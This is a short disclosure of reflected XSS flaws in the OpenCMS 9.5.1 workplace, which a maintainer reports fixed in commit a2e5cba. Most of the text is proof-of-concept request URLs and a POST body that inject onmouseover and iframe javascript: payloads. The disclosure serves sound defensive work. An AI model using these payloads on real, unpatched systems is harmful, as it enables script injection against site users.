Multiple XSS Vulnerabilities OpenCMS 9.5.1

[rehanah]

During some security testing I have identified the following XSS (reflected) vulnerabilities.The OpenCMS 9.5.1 workplace do not properly validate pages and parameters throughout the application.

Request Method: GET

1. /opencms/system/modules/org.opencms.workplace.help/jsptemplates/help_head.jsp?__locale=en&homelink="+onmouseover="javascript:confirm(0);">Click HERE<!--
2. /opencms/system/workplace/locales/en/help/index.html?buildframe=true&workplaceresource="+onmouseover=confirm(0)//
3. /opencms/system/workplace/views/admin/admin-main.jsp?root=explorer&menu=no&path=%2Fpublishqueue';[XSS PAYLOAD]
4. /opencms/system/workplace/views/explorer/explorer_files.jsp?mode=explorerview";[XSS PAYLOAD]

Request Method: POST

POST /opencms/system/modules/org.opencms.workplace.help/elements/search.jsp?__locale=en HTTP/1.1
..........................................................................................................................................................
..........................................................................................................................................................
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Content-Length: 104

action=search&query=<iframe src=javascript:confirm(0) &index=German+online+help&searchPage=1&query2=1234

[tHerrmann]

These issues are fixed by commit a2e5cba.